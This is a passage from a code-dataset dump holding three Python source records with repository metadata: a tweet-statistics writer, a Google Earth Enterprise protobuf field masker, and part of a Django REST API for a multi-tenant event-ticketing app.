outFile.write(\"Term\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(localesArray[i] + \"\\t\")\n\n outFile.write(\"\\n\")\n\n for i in range(0,len(queryArray)):\n outFile.write(queryArray[i] + \"\\t\")\n for j in range(0,len(localesArray)):\n if (totalTweets[j] > 0):\n outFile.write(str(float(queryCounts[j][i])/float(totalTweets[j])) + \"\\t\")\n else:\n outFile.write(\"undef\\t\") \n outFile.write(\"\\n\")\n\n outFile.write(\"\\n\\n\")\n outFile.write(\"AGGREGATE SCORE\\n\")\n outFile.write(\"Term\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(localesArray[i] + \"\\t\")\n\n outFile.write(\"\\n\")\n\n for i in range(0,len(queryArray)):\n outFile.write(queryArray[i] + \"\\t\")\n for j in range(0,len(localesArray)):\n outFile.write(str(queryScores[j][i]) + \"\\t\")\n outFile.write(\"\\n\")\n\n outFile.write(\"\\n\\n\")\n outFile.write(\"AVERAGE SCORE\\n\")\n outFile.write(\"Term\\t\")\n\n # --> START HERE, NEED TO CALCULATE AVERAGES\n\n averagesArray = []\n normsArray = []\n\n for i in range(0,len(localesArray)):\n averagesArray.append([0.0] * len(queryArray))\n 
normsArray.append([0.0] * len(queryArray))\n\n for i in range(0,len(localesArray)):\n for j in range(0,len(queryArray)):\n if queryCounts[i][j] > 0:\n averagesArray[i][j]=str(queryScores[i][j]/float(queryCounts[i][j]))\n if overallAverageScores[i] > 0:\n normsArray[i][j]=str((queryScores[i][j]/float(queryCounts[i][j]))/(overallAverageScores[i]))\n else:\n normsArray[i][j]=\"undef\"\n else:\n averagesArray[i][j]=\"undef\"\n normsArray[i][j]=\"undef\"\n\n for i in range(0,len(localesArray)):\n outFile.write(localesArray[i] + \"\\t\")\n\n outFile.write(\"\\n\")\n\n for i in range(0,len(queryArray)):\n outFile.write(queryArray[i] + \"\\t\")\n for j in range(0,len(localesArray)):\n outFile.write(averagesArray[j][i] + \"\\t\")\n outFile.write(\"\\n\")\n\n outFile.write(\"\\n\\n\")\n outFile.write(\"STANDARD DEVIATION OF SCORES\\n\")\n outFile.write(\"Term\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(localesArray[i] + \"\\t\")\n\n outFile.write(\"\\n\")\n\n for i in range(0,len(queryArray)):\n outFile.write(queryArray[i] + \"\\t\")\n for j in range(0,len(localesArray)):\n outFile.write(str(stdevs[j][i]) + \"\\t\")\n outFile.write(\"\\n\")\n\n outFile.write(\"\\n\\n\")\n outFile.write(\"STANDARD ERROR OF SCORES\\n\")\n outFile.write(\"Term\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(localesArray[i] + \"\\t\")\n\n outFile.write(\"\\n\")\n\n for i in range(0,len(queryArray)):\n outFile.write(queryArray[i] + \"\\t\")\n for j in range(0,len(localesArray)):\n outFile.write(str(stderrs[j][i]) + \"\\t\")\n outFile.write(\"\\n\")\n\n outFile.write(\"\\n\\n\")\n outFile.write(\"NORMALIZED SCORE\\n\")\n outFile.write(\"Term\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(localesArray[i] + \"\\t\")\n\n outFile.write(\"\\n\")\n\n for i in range(0,len(queryArray)):\n outFile.write(queryArray[i] + \"\\t\")\n for j in range(0,len(localesArray)):\n outFile.write(normsArray[j][i] + \"\\t\")\n outFile.write(\"\\n\")\n \n outFile.close()\n tweetsFile.close()\n\nif __name__ == '__main__':\n main()\n","repo_name":"eabrash/Emi-Programs","sub_path":"ParsedTweetReader.py","file_name":"ParsedTweetReader.py","file_ext":"py","file_size_in_byte":11844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"30039735327","text":"from serve.snippets.data import hard_masked_snippets\nfrom serve.snippets.data import masked_snippets\nfrom serve.snippets.util import dbroot_utils\nfrom serve.snippets.util import path_converters\nfrom serve.snippets.util import path_utils\nfrom serve.snippets.util import proto_reflection\nfrom serve.snippets.util import sparse_tree\n\n# TODO: should fold this google.* into proto_reflection\nimport google.protobuf.descriptor\n\n\ndef ForcedFieldValues(log):\n \"\"\"loads + returns fields that are to be forced, with their values.\n\n Args:\n log: logging obj.\n Returns:\n Set of fields paths user should never see or touch.\n \"\"\"\n if not ForcedFieldValues.cached:\n ForcedFieldValues.cached = _LoadPathValuesFromDict(\n hard_masked_snippets.hard_masked_snippets, log)\n return ForcedFieldValues.cached\n# Simple, full path -> value; no attempt at representing them as a 'tree'.\nForcedFieldValues.cached = {}\n\n\ndef HardSuppressedFields(log):\n \"\"\"Set, of fields that are hardwired + out of reach of the user.\n\n Their values are forced into the protobuf; the user never gets to see them.\n\n Args:\n log: logging obj.\n Returns:\n Set of fields paths user should never see or touch.\n \"\"\"\n 
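# Added note: the suppression set is just the keys of the forced-value map;\n  # e.g. a hypothetical {\"end_snippet.a.b\": True} entry suppresses the path\n  # \"end_snippet.a.b\".\n  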
return set(ForcedFieldValues(log).keys())\n\n\ndef NerfedDefaultFieldValues(log):\n \"\"\"loads + returns the nerfed default field values.\n\n These are fields which have defaults baked into the protobuf's\n definition which are inconvenient for Google (mostly, urls that\n point at google.com). This is a list of these, with values to set\n them to, instead. The user can see and change them, and indeed,\n could set them back to 'inconvenient' values, but we prevent that\n from happening, by default.\n\n Args:\n log: logging obj.\n Returns:\n dict, of nerfed value by fieldpath.\n \"\"\"\n if not NerfedDefaultFieldValues.cached:\n NerfedDefaultFieldValues.cached = _LoadPathValuesFromDict(\n masked_snippets.masked_snippets, log)\n return NerfedDefaultFieldValues.cached\n# Simple, full path -> value; no attempt at representing them as a 'tree'.\nNerfedDefaultFieldValues.cached = {}\n\n\ndef _FlexibleBool(bool_text):\n \"\"\"Tolerant boolean text.\n\n Args:\n bool_text: the bool text.\n\n Returns:\n Boolean value of text.\n\n Raises:\n ValueError: if the text bool isn't recognized.\n \"\"\"\n as_lower = bool_text.lower()\n if as_lower in _FlexibleBool.TEXT_TRUES:\n return True\n elif as_lower in _FlexibleBool.TEXT_FALSES:\n return False\n else:\n raise ValueError(\"Can't convert '%s' to bool\" % bool_text)\n_FlexibleBool.TEXT_TRUES = set([\"yes\", \"y\", \"true\", \"t\", \"on\", \"1\"])\n_FlexibleBool.TEXT_FALSES = set([\"no\", \"n\", \"false\", \"f\", \"off\", \"0\"])\n\n\ndef _LoadPathValuesFromDict(snippets, log):\n \"\"\"Loads {fieldpath: value} from dictionary.\n\n Verifies field path spelling and demangle it into valid protobuf source\n form.\n a.b.c:value -> a.b.c.value\n\n Args:\n snippets: snippets path:value map.\n log: logging obj.\n Returns:\n A dict, of value, by fieldpath.\n \"\"\"\n hardwired_values = {}\n for mangled_path, value in snippets.iteritems():\n # Allow for value being multi-word. of course is 'abstract',\n # ie looks like 'a.b.c', no [] or indices.\n log.debug(\"field:[%s], value:[%s]\", mangled_path, str(value))\n log.debug(\"maybe mangled: %s\", mangled_path)\n path = path_converters.Demangled(mangled_path)\n log.debug(\"path: %s\", path)\n if not proto_reflection.IsLegitFieldPath(path):\n log.warning(\n \"The path '%s' is misspelled or otherwise does not exist.\"\n \" Skipping.\", path)\n continue\n\n if not path_utils.IsAbstract(path):\n log.warning(\n \"The above path is expected to be abstract (no \\'[\\', \\']\\'\"\n \" or indices).\")\n\n # Assure the end_snippet prefix\n path = path_utils.EnsureFull(path)\n field_type = proto_reflection.TypeAtFieldPath(\n dbroot_utils.MakeEmptyDbroot(), path)\n\n log.debug(\"field:[%s], value:[%s]\", path, str(value))\n if field_type == google.protobuf.descriptor.FieldDescriptor.TYPE_BOOL:\n if isinstance(value, str):\n value = _FlexibleBool(value)\n log.debug(\"path getting bool default: %s: %s\", path, str(value))\n\n hardwired_values[path] = value\n return hardwired_values\n\n\ndef RemoveSuppressedFields(store, log):\n \"\"\"Takes fields out of the sparse tree that is on its way to the client-side.\n\n Args:\n store: multi-level dict representing the end_snippet.\n log: logging obj.\n \"\"\"\n # plain {path -> value}, not sparse\n log.debug(\">suppress_fields\")\n\n # 'unnerf' - why do we do this...?\n # _unnerf(store, log)\n\n for path in HardSuppressedFields(log):\n log.debug(\"path... \" + path)\n log.debug(\"removing if present... 
\" + path)\n if sparse_tree.HasAbstractFieldPath(path, store):\n # TODO: why do we split finding + removing?\n sparse_tree.RemoveAbstractField(path, store)\n log.debug(\" value, not sparse\n path_values = ForcedFieldValues(log)\n # JGD arg; need to gussy up these abstract paths with repeated markers.\n log.debug(\"have %d fields to force\", len(path_values))\n for abstract_path, value in path_values.iteritems():\n log.debug(\"finding concrete paths for: %s\", abstract_path)\n # Just changing the form for the next call.\n empty_concrete_path = proto_reflection.EmptyConcretizeFieldPath(\n abstract_path)\n log.debug(\"empty_concrete_path: %s\", empty_concrete_path)\n if empty_concrete_path:\n sparse_tree.SetAbstractField(empty_concrete_path, value, store, log)\n\n\ndef NerfUnwantedExposedDefaults(store, log):\n \"\"\"Adds nerfed values to unsafe / inconvenient fields in the 'store'.\n\n Lit of snippets which default values need to be reseted in proto dbroot.\n Function collects these snippets in store and changes default values to an\n acceptable value.\n The canonical example is urls that point to Google servers, but there are\n others.\n\n Args:\n store: multi-level dict mimicking the end_snippets protobuf.\n log: logging obj.\n \"\"\"\n log.debug(\"Collect and mask unwanted defaults...\")\n # plain path -> value, not sparse\n path_values = NerfedDefaultFieldValues(log)\n log.debug(\"... pathes loaded.\")\n for path, value in path_values.iteritems():\n log.debug(\"..has?\" + path)\n if not sparse_tree.HasAbstractFieldPath(path, store):\n log.debug(\"..set?\" + path)\n sparse_tree.SetAbstractField(path, value, store, log)\n log.debug(\"Masked fields collected.\")\n\n\ndef main():\n pass\n # log = logging_setup.init_logger(\"snippet-vetting.log\", logging.DEBUG)\n # snippets = _LoadPathValuesFromDict(\n # hard_masked_snippets.hard_masked_snippets, log)\n # print snippets\n #\n # just sanity checking. 
Probably is out-of-date.\n # log = logging_setup.init_logger(\"snippet-vetting.log\", logging.DEBUG)\n # _LoadPathValues(configuration.SNIPPET_NERF_FILEPATH, log)\n # _LoadPathValues(configuration.SNIPPET_HARDMASK_FILEPATH, log)\n # nerf_unwanted_exposed_defaults({}, log)\n # force_fields({}, log)\n # remove_suppressed_fields({}, log)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"google/earthenterprise","sub_path":"earth_enterprise/src/server/wsgi/serve/snippets/util/snippet_masker.py","file_name":"snippet_masker.py","file_ext":"py","file_size_in_byte":7412,"program_lang":"python","lang":"en","doc_type":"code","stars":2622,"dataset":"github-code","pt":"86"} +{"seq_id":"32705003472","text":"# Create your views here.\nimport decimal\n\nimport csv\nimport json\nimport uuid\nfrom decimal import Decimal\n\nfrom datetime import datetime, timedelta\nimport dateutil.parser\nimport pytz\nimport requests\nimport stripe\nfrom django.contrib import messages\nfrom django.contrib.auth.models import Group\nfrom django.core.exceptions import ValidationError\nfrom django.core import management\n\nfrom django.core.validators import URLValidator\nfrom django.http import HttpResponseRedirect, Http404, HttpResponse\nfrom django.utils import timezone\nfrom django.views import View\nfrom django.views.generic import TemplateView\nfrom django_tenants.utils import schema_context, tenant_context\nfrom rest_framework import serializers\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework.generics import get_object_or_404\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\n\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.text import slugify\nfrom rest_framework.views import APIView\n\nfrom ApiBillet.serializers import EventSerializer, PriceSerializer, ProductSerializer, ReservationSerializer, \\\n ReservationValidator, MembreValidator, ConfigurationSerializer, NewConfigSerializer, \\\n EventCreateSerializer, TicketSerializer, OptionsSerializer, ChargeCashlessValidator, NewAdhesionValidator, \\\n DetailCashlessCardsValidator, DetailCashlessCardsSerializer, CashlessCardsValidator, \\\n UpdateFederatedAssetFromCashlessValidator\nfrom AuthBillet.models import TenantAdminPermission, TibilletUser, RootPermission, TenantAdminPermissionWithRequest\nfrom AuthBillet.utils import user_apikey_valid, get_or_create_user\nfrom BaseBillet.tasks import create_ticket_pdf, report_to_pdf, report_celery_mailer\nfrom Customers.models import Client, Domain\nfrom BaseBillet.models import Event, Price, Product, Reservation, Configuration, Ticket, Paiement_stripe, \\\n OptionGenerale, Membership\nfrom rest_framework import viewsets, permissions, status\nfrom django.db import connection, IntegrityError\nfrom TiBillet import settings\n\nimport os\n\nfrom MetaBillet.models import EventDirectory, ProductDirectory\nfrom PaiementStripe.views import new_entry_from_stripe_invoice\nfrom QrcodeCashless.models import Detail, CarteCashless, Wallet, Asset, SyncFederatedLog\nfrom QrcodeCashless.views import WalletValidator\nfrom root_billet.models import RootConfiguration\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass DecimalEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, decimal.Decimal):\n return str(o)\n return super(DecimalEncoder, self).default(o)\n\n\n# Refactor for get_permission\n# Si c'est list/retrieve -> pour tout le monde\n# Sinon, on vérifie la clé api\ndef get_permission_Api_LR_Any(self):\n 
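# English gloss of the French comments above and below: list/retrieve are\n    # open to everyone; every other action requires the API key. If API-key\n    # auth yields a user, the key is valid.\n    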
# Si c'est une auth avec APIKEY,\n # on vérifie avec notre propre moteur\n # Si l'user est rendu, la clé est valide\n user_api = user_apikey_valid(self)\n if user_api:\n permission_classes = []\n self.request.user = user_api\n\n elif self.action in ['list', 'retrieve']:\n permission_classes = [permissions.AllowAny]\n else:\n permission_classes = [TenantAdminPermission]\n\n return [permission() for permission in permission_classes]\n\n\ndef get_permission_Api_LR_Admin(self):\n user_api = user_apikey_valid(self)\n if user_api:\n permission_classes = []\n self.request.user = user_api\n\n elif self.action in ['list', 'retrieve']:\n permission_classes = [TenantAdminPermission]\n else:\n permission_classes = [permissions.AllowAny]\n return [permission() for permission in permission_classes]\n\n\nclass TarifBilletViewSet(viewsets.ViewSet):\n\n def list(self, request):\n queryset = Price.objects.all().order_by('prix')\n serializer = PriceSerializer(queryset, many=True, context={'request': request})\n return Response(serializer.data)\n\n def create(self, request):\n serializer = PriceSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get_permissions(self):\n return get_permission_Api_LR_Any(self)\n\n\nclass ProductViewSet(viewsets.ViewSet):\n\n def list(self, request):\n serializer = ProductSerializer(\n Product.objects.all(),\n many=True, context={'request': request})\n return Response(serializer.data)\n\n def create(self, request):\n serializer = ProductSerializer(data=request.data)\n if serializer.is_valid():\n product = serializer.save()\n if getattr(serializer, 'img_img', None):\n product.img.save(serializer.img_name, serializer.img_img.fp)\n\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n for error in [serializer.errors[error][0] for error in serializer.errors]:\n if error.code == \"unique\":\n return Response(serializer.errors, status=status.HTTP_409_CONFLICT)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get_permissions(self):\n return get_permission_Api_LR_Any(self)\n\n\nclass TenantViewSet(viewsets.ViewSet):\n\n def create(self, request):\n # Le slug est-il disponible ?\n try:\n slug = slugify(request.data.get('organisation'))\n Client.objects.get(schema_name=slug)\n logger.warning(f\"{slug} exist : Conflict\")\n return Response(\n {f\"{slug} existe déja : Conflit de nom\"},\n status=status.HTTP_409_CONFLICT)\n except Client.DoesNotExist:\n pass\n\n # L'url correspond bien à la catégorie choisie ?\n if not request.data.get('categorie'):\n raise serializers.ValidationError(_(\"categorie est obligatoire\"))\n categories = []\n if 'place' in request.get_full_path():\n categories = [Client.SALLE_SPECTACLE, Client.FESTIVAL]\n if 'artist' in request.get_full_path():\n categories = [Client.ARTISTE]\n\n if request.data.get('categorie') not in categories:\n raise serializers.ValidationError(_(\"categorie ne correspond pas à l'url\"))\n\n serializer = NewConfigSerializer(data=request.data, context={'request': request})\n\n # import ipdb; ipdb.set_trace()\n\n if serializer.is_valid():\n\n futur_conf = serializer.validated_data\n slug = slugify(futur_conf.get('organisation'))\n with schema_context('public'):\n try:\n tenant, created = Client.objects.get_or_create(\n schema_name=slug,\n name=futur_conf.get('organisation'),\n categorie=request.data.get('categorie'),\n )\n\n 
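# Added note: the slug's availability was already checked above, so\n                # created should only be False here if a concurrent request\n                # registered the same tenant in between.\n                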
if not created:\n logger.error(f\"{futur_conf.get('organisation')} existe déja\")\n return Response(_(json.dumps(\n {\"uuid\": f\"{tenant.uuid}\", \"msg\": f\"{futur_conf.get('organisation')} existe déja\"})),\n status=status.HTTP_409_CONFLICT)\n\n domain, created = Domain.objects.get_or_create(\n domain=f\"{slug}.{os.getenv('DOMAIN')}\",\n tenant=tenant,\n is_primary=True\n )\n\n # Ajoute des cartes de test DEMO\n if settings.DEBUG and slug == \"demo\":\n management.call_command(\"load_cards\", \"--demo\")\n\n except IntegrityError as e:\n logger.error(e)\n return Response(_(f\"{e}\"), status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n logger.error(e)\n return Response(_(f\"{e}\"), status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n with tenant_context(tenant):\n rootConf = RootConfiguration.get_solo()\n conf = Configuration.get_solo()\n info_stripe = serializer.info_stripe\n\n serializer.update(instance=conf, validated_data=futur_conf)\n\n conf.slug = slug\n\n conf.email = info_stripe.email\n conf.site_web = info_stripe.business_profile.url\n conf.phone = info_stripe.business_profile.support_phone\n\n conf.stripe_mode_test = rootConf.stripe_mode_test\n\n if rootConf.stripe_mode_test:\n conf.stripe_connect_account_test = info_stripe.id\n else:\n conf.stripe_connect_account = info_stripe.id\n\n if getattr(serializer, 'img_img', None):\n conf.img.save(serializer.img_name, serializer.img_img.fp)\n if getattr(serializer, 'logo_img', None):\n conf.logo.save(serializer.logo_name, serializer.logo_img.fp)\n\n conf.save()\n conf.check_serveur_cashless()\n # user.client_admin.add(tenant)\n\n staff_group = Group.objects.get(name=\"staff\")\n\n user_from_email_nouveau_tenant = get_or_create_user(conf.email, force_mail=True)\n user_from_email_nouveau_tenant.client_admin.add(tenant)\n user_from_email_nouveau_tenant.is_staff = True\n user_from_email_nouveau_tenant.groups.add(staff_group)\n user_from_email_nouveau_tenant.save()\n\n place_serialized = ConfigurationSerializer(Configuration.get_solo(), context={'request': request})\n place_serialized_with_uuid = {'uuid': f\"{tenant.uuid}\"}\n place_serialized_with_uuid.update(place_serialized.data)\n\n return Response(place_serialized_with_uuid, status=status.HTTP_201_CREATED)\n\n logger.error(f\"serializer.errors : {serializer.errors}\")\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n # def update(self, request, pk=None):\n # tenant = get_object_or_404(Client, pk=pk)\n # user: TibilletUser = request.user\n # if tenant not in user.client_admin.all():\n # return Response(_(f\"Not Allowed\"), status=status.HTTP_405_METHOD_NOT_ALLOWED)\n # with tenant_context(tenant):\n # conf = Configuration.get_solo()\n # serializer = NewConfigSerializer(conf, data=request.data, partial=True)\n # if serializer.is_valid():\n # # serializer.save()\n # serializer.update(conf, serializer.validated_data)\n # return Response(serializer.data, status=status.HTTP_201_CREATED)\n #\n # return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def list(self, request):\n places_serialized_with_uuid = []\n configurations = []\n categories = []\n if 'place' in request.get_full_path():\n categories = [Client.SALLE_SPECTACLE, Client.FESTIVAL]\n if 'artist' in request.get_full_path():\n categories = [Client.ARTISTE]\n\n for tenant in Client.objects.filter(categorie__in=categories):\n with tenant_context(tenant):\n places_serialized_with_uuid.append({\"uuid\": f\"{tenant.uuid}\"})\n configurations.append(Configuration.get_solo())\n\n 
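# Added note: the loop above switches schemas once per tenant; the\n        # serializer below then makes a single pass over the collected\n        # configurations.\n        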
places_serialized = ConfigurationSerializer(configurations, context={'request': request}, many=True)\n\n for key, value in enumerate(places_serialized.data):\n places_serialized_with_uuid[key].update(value)\n\n return Response(places_serialized_with_uuid)\n\n def retrieve(self, request, pk=None):\n tenant = get_object_or_404(Client.objects.filter(categorie__in=['S', 'F']), pk=pk)\n with tenant_context(tenant):\n place_serialized = ConfigurationSerializer(Configuration.get_solo(), context={'request': request})\n place_serialized_with_uuid = {'uuid': f\"{tenant.uuid}\"}\n place_serialized_with_uuid.update(place_serialized.data)\n return Response(place_serialized_with_uuid)\n\n def get_permissions(self):\n if self.action == 'create':\n permission_classes = [permissions.IsAuthenticated]\n return [permission() for permission in permission_classes]\n else:\n return get_permission_Api_LR_Any(self)\n # permission_classes = [permissions.AllowAny]\n\n\nclass HereViewSet(viewsets.ViewSet):\n\n def list(self, request):\n config = Configuration.get_solo()\n place_serialized = ConfigurationSerializer(config, context={'request': request})\n\n dict_return = {'uuid': f\"{connection.tenant.uuid}\"}\n dict_return.update(place_serialized.data)\n\n products_adhesion = Product.objects.filter(\n categorie_article=Product.ADHESION,\n prices__isnull=False\n ).distinct()\n\n if len(products_adhesion) > 0:\n products_serializer = ProductSerializer(products_adhesion, many=True)\n dict_return['membership_products'] = products_serializer.data\n\n return Response(dict_return)\n\n def get_permissions(self):\n return get_permission_Api_LR_Any(self)\n\n\nclass EventsSlugViewSet(viewsets.ViewSet):\n def retrieve(self, request, pk=None):\n queryset = Event.objects.all().order_by('-datetime')\n event = get_object_or_404(queryset, slug=pk)\n serializer = EventSerializer(event)\n return Response(serializer.data)\n\n def get_permissions(self):\n return get_permission_Api_LR_Any(self)\n\n\nclass EventsViewSet(viewsets.ViewSet):\n\n def list(self, request):\n tenant: Client = connection.tenant\n four_hour_before_now = datetime.now().date() - timedelta(hours=4)\n\n production_places = [Client.SALLE_SPECTACLE, Client.FESTIVAL]\n if tenant.categorie in production_places:\n queryset = Event.objects.filter(datetime__gte=four_hour_before_now).order_by('datetime')\n events_serialized = EventSerializer(queryset, many=True, context={'request': request})\n return Response(events_serialized.data)\n\n elif tenant.categorie == Client.ARTISTE:\n artist = tenant\n directory = {}\n events_serialized_data = []\n with schema_context('public'):\n events_from_public_directory = EventDirectory.objects.filter(\n datetime__gte=four_hour_before_now,\n artist=artist\n )\n for event in events_from_public_directory:\n if directory.get(event.place):\n directory[event.place].append(event.event_uuid)\n else:\n directory[event.place] = []\n directory[event.place].append(event.event_uuid)\n\n for place in directory:\n with tenant_context(place):\n queryset = Event.objects.filter(uuid__in=directory[place])\n events_serialized = EventSerializer(queryset, many=True, context={'request': request})\n for data in events_serialized.data:\n events_serialized_data.append(data)\n\n return Response(events_serialized_data)\n\n elif tenant.categorie == Client.META:\n events_serialized_data = []\n tenants = Client.objects.filter(categorie=Client.SALLE_SPECTACLE)\n for other_tenant in tenants:\n with tenant_context(other_tenant):\n queryset = 
Event.objects.filter(datetime__gte=four_hour_before_now).order_by('datetime')\n events_serialized = EventSerializer(queryset, many=True, context={'request': request})\n for data in events_serialized.data:\n events_serialized_data.append(data)\n return Response(events_serialized_data)\n\n def retrieve(self, request, pk=None):\n queryset = Event.objects.all().order_by('-datetime')\n event = get_object_or_404(queryset, pk=pk)\n serializer = EventSerializer(event)\n return Response(serializer.data)\n\n def create(self, request):\n serializer_create = EventCreateSerializer(data=request.data)\n if serializer_create.is_valid():\n # import ipdb; ipdb.set_trace()\n event: Event = serializer_create.validated_data\n serializer = EventSerializer(event)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n logger.error(f\"EventsViewSet : {serializer_create.errors}\")\n return Response(serializer_create.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def update(self, request, pk=None):\n queryset = Event.objects.all().order_by('-datetime')\n event = get_object_or_404(queryset, pk=pk)\n serializer = EventSerializer(event, data=request.data, partial=True)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def destroy(self, request, pk=None):\n queryset = Event.objects.all().order_by('-datetime')\n event = get_object_or_404(queryset, pk=pk)\n event.delete()\n return Response(('deleted'), status=status.HTTP_200_OK)\n\n def get_permissions(self):\n return get_permission_Api_LR_Any(self)\n\n\nclass DetailCashlessCards(viewsets.ViewSet):\n def create(self, request):\n validator = DetailCashlessCardsValidator(data=request.data, context={'request': request})\n if validator.is_valid():\n with schema_context('public'):\n logger.info('Detail valide')\n detailC = validator.save()\n serializer = DetailCashlessCardsSerializer(detailC)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n return Response(validator.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get_permissions(self):\n permission_classes = [RootPermission]\n return [permission() for permission in permission_classes]\n\n\nclass Loadcardsfromdict(viewsets.ViewSet):\n def create(self, request):\n # logger.info(request.data)\n\n validator = CashlessCardsValidator(data=request.data, many=True)\n if validator.is_valid():\n prems = validator.data[0]\n detail = Detail.objects.get(uuid=prems.get('detail'))\n for carte in validator.data:\n part = carte.get('url').partition('/qr/')\n base_url = f\"{part[0]}{part[1]}\"\n uuid_qrcode = uuid.UUID(part[2], version=4)\n if detail.uuid == uuid.UUID(carte.get('detail'), version=4) and base_url == detail.base_url:\n try:\n carte, created = CarteCashless.objects.get_or_create(\n tag_id=carte['tag_id'],\n uuid=uuid_qrcode,\n number=carte['number'],\n detail=detail,\n )\n logger.info(f\"{created}: {carte}\")\n\n except Exception as e:\n logger.error(e)\n Response(_(f\"Erreur d'importation {e}\"),\n status=status.HTTP_406_NOT_ACCEPTABLE)\n else:\n Response(_(f\"Erreur d'importation : Detail ne correspond pas\"),\n status=status.HTTP_406_NOT_ACCEPTABLE)\n\n return Response(\"poulpe\", status=status.HTTP_200_OK)\n\n return Response(validator.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get_permissions(self):\n permission_classes = [RootPermission]\n return [permission() for permission in permission_classes]\n\n\nclass 
ChargeCashless(viewsets.ViewSet):\n def create(self, request):\n configuration = Configuration.get_solo()\n if not configuration.key_cashless or not configuration.server_cashless:\n return Response(_(\"Serveur cashless non présent dans configuration\"),\n status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n try:\n response = requests.request(\"GET\",\n f\"{configuration.server_cashless}/api/checkcarteqruuid/{request.data.get('uuid')}/\",\n headers={\"Authorization\": f\"Api-Key {configuration.key_cashless}\"},\n )\n\n if response.status_code != 200:\n return Response(_(f\"Requete non comprise : {response.status_code}\"),\n status=status.HTTP_405_METHOD_NOT_ALLOWED)\n except Exception as e:\n return Response(_(f\"Serveur cashless ne répond pas : {e}\"), status=status.HTTP_408_REQUEST_TIMEOUT)\n\n validator = ChargeCashlessValidator(data=request.data, context={'request': request})\n if validator.is_valid():\n # serializer.save()\n return Response(validator.data, status=status.HTTP_201_CREATED)\n return Response(validator.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get_permissions(self):\n permission_classes = [permissions.IsAuthenticated]\n return [permission() for permission in permission_classes]\n\n\nclass ReservationViewset(viewsets.ViewSet):\n def list(self, request):\n queryset = Reservation.objects.all().order_by('-datetime')\n serializer = ReservationSerializer(queryset, many=True, context={'request': request})\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Reservation.objects.all().order_by('-datetime')\n resa = get_object_or_404(queryset, pk=pk)\n serializer = ReservationSerializer(resa)\n return Response(serializer.data)\n\n def create(self, request):\n # import ipdb; ipdb.set_trace()\n logger.info(f\"ReservationViewset CREATE : {request.data}\")\n\n validator = ReservationValidator(data=request.data, context={'request': request})\n if validator.is_valid():\n return Response(validator.data, status=status.HTTP_201_CREATED)\n\n logger.error(f\"ReservationViewset CREATE ERROR : {validator.errors}\")\n return Response(validator.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get_permissions(self):\n return get_permission_Api_LR_Admin(self)\n\n\nclass OptionTicket(viewsets.ViewSet):\n def list(self, request):\n queryset = OptionGenerale.objects.all()\n serializer = OptionsSerializer(queryset, many=True, context={'request': request})\n return Response(serializer.data)\n\n def create(self, request):\n validator = OptionsSerializer(data=request.data, context={'request': request})\n if validator.is_valid():\n validator.save()\n return Response(validator.data, status=status.HTTP_201_CREATED)\n else:\n for error in [validator.errors[error][0] for error in validator.errors]:\n if error.code == \"unique\":\n return Response(validator.errors, status=status.HTTP_409_CONFLICT)\n return Response(validator.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get_permissions(self):\n return get_permission_Api_LR_Any(self)\n\n\ndef borne_temps_4h():\n now = timezone.now()\n jour = now.date()\n tzlocal = pytz.timezone(Configuration.get_solo().fuseau_horaire)\n debut_jour = tzlocal.localize(datetime.combine(jour, datetime.min.time()), is_dst=None) + timedelta(\n hours=4)\n lendemain_quatre_heure = tzlocal.localize(datetime.combine(jour, datetime.max.time()), is_dst=None) + timedelta(\n hours=4)\n\n if now < debut_jour:\n # Alors on demande au petit matin.\n # Les bornes sont ceux de la veille.\n return debut_jour - timedelta(days=1), debut_jour\n else:\n 
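# English gloss of the French comments above, and of this branch: before\n        # 04:00 local time the bounds are yesterday 04:00 to today 04:00;\n        # from 04:00 onward the day runs today 04:00 to tomorrow 04:00.\n        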
